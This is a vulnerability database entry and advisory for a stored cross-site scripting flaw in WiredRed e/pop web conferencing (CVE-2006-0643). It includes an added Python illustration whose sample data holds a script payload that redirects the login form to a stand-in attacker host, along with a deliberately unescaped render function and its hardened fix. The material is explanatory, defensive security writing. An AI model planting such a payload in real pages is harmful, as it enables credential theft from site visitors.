WiredRed e/pop Web Conferencing Cross-Site Scripting Vulnerability

Vulnerability ID: 1196107    Vulnerability type: Cross-site scripting
Published: 2006-02-08    Updated: 2007-03-01
CVE ID: CVE-2006-0643    CNNVD ID: CNNVD-200602-137
Platform: N/A    CVSS score: 4.3
|Sources
https://www.securityfocus.com/bid/16542
https://cxsecurity.com/issue/WLB-2006020030
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200602-137
|Details
A cross-site scripting (XSS) vulnerability exists in WiredRed e/pop Web Conferencing 4.1.0.755. A remote authenticated user can inject arbitrary web script or HTML via the topic name of a conference; the topic is stored and rendered to other users, so the payload executes in their browsers.
|Exploit
WiredRed EPOP XSS Vulnerability

---Summary---

Software Affected:  EPOP WebConference Server
Software Versions:  4.1.0.755
Vendors URL:        www.wiredred.com
Vulnerability Type: Cross Site Scripting
Proof of Concept:   An exploit is not required
Threat Level:       Low

---Product Description---

e/pop from WiredRed provides a complete solution for all of your real-time communications requirements: web and desktop video conferencing, secure IM and alert messaging. As a user, you'll love the hassle-free interface and breadth of options that will enhance your training, sales and collaboration.

---Vulnerability Description---

When creating public or private conferences in the e/pop server, the topic name is not properly sanitized. This allows for an XSS attack in which every user who visits the root (login) page for the e/pop web server can be fooled into entering their login information on a remote server, among other things. By default, e/pop is enabled without or with optional SSL connections to the web server. Any standard authenticated user can perform this attack on all other users or visitors of the web server.

---Solution---

None at this time.

---Credit---

Adrian Castro

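The pattern the advisory describes, an authenticated user's conference topic written unescaped into the login page that every visitor loads, and the corresponding fix, as an added example. This is not WiredRed's code; the page layout, the function names, the attacker host and the sample conferences are all constructed for illustration. Note that the optional SSL the advisory mentions does not help here: the payload is stored server-side and delivered over whatever transport the page uses.

```python
"""Stored XSS through an unescaped conference topic, and the hardened render.

Added illustration, not WiredRed's code. Models the advisory's pattern: an
authenticated user creates a conference, and its topic is later written into
the root (login) page served to every visitor. All names, the page layout and
the sample data below are hypothetical.
"""
from html import escape

# Constructed sample data. The second topic is an attacker-supplied payload
# that repoints the login form at a remote host to harvest credentials, the
# outcome the advisory warns about.
CONFERENCES = [
    {"id": 1, "topic": "Weekly sales sync"},
    {"id": 2, "topic": ('</a><script>document.forms[0].action='
                        '"http://attacker.example/";</script>')},
]

# Hypothetical login page; the conference list is rendered below the form.
_PAGE = ("<html><body><form method=post action=/login>"
         "<input name=user><input name=pass type=password></form>"
         "<ul>{items}</ul></body></html>")


def render_login_page_vulnerable(conferences):
    """Concatenates raw topic names into the page: stored XSS."""
    items = "".join(
        f'<li><a href="/conf?id={c["id"]}">{c["topic"]}</a></li>'
        for c in conferences
    )
    return _PAGE.format(items=items)


def render_login_page_hardened(conferences):
    """Same page, with each untrusted value encoded for its output context.

    The topic goes through html.escape (quote=True also neutralises it inside
    attribute values); the id is forced to an int so the href cannot carry
    markup either.
    """
    items = "".join(
        f'<li><a href="/conf?id={int(c["id"])}">'
        f'{escape(str(c["topic"]), quote=True)}</a></li>'
        for c in conferences
    )
    return _PAGE.format(items=items)


def validate_topic(topic, max_len=120):
    """Defence in depth at creation time: reject empty, oversized or
    control-character topics. This does NOT replace output encoding; a
    legitimate topic such as 'Q&A <open>' must still be escaped on render."""
    if not isinstance(topic, str) or not 0 < len(topic) <= max_len:
        return False
    return all(ch.isprintable() for ch in topic)


def script_tag_present(html_doc):
    """Crude oracle: does a <script> element appear as live markup?"""
    return "<script" in html_doc.lower()


if __name__ == "__main__":
    print("vulnerable page carries script:",
          script_tag_present(render_login_page_vulnerable(CONFERENCES)))
    print("hardened page carries script:  ",
          script_tag_present(render_login_page_hardened(CONFERENCES)))
```

The fix is output encoding at the point where the topic is written into HTML; input validation is only a secondary control, and a Content-Security-Policy that disallows inline script would further limit what a missed escape can do.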
|Affected products
WiredRed e/pop Web Conferencing 4.1.0.755
|References

Source: BID
Name: 16542
Link: http://www.securityfocus.com/bid/16542
Source: BUGTRAQ
Name: 20060208 WiredRed EPOP XSS Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/424419/100/0/threaded
Source: XF
Name: epop-topic-xss(24609)
Link: http://xforce.iss.net/xforce/xfdb/24609
Source: OSVDB
Name: 22997
Link: http://www.osvdb.org/22997
Source: VUPEN
Name: ADV-2006-0505
Link: http://www.frsirt.com/english/advisories/2006/0505
Source: SREASON
Name: 421
Link: http://securityreason.com/securityalert/421
Source: SECUNIA
Name: 18753
Link: http://secunia.com/advisories/18753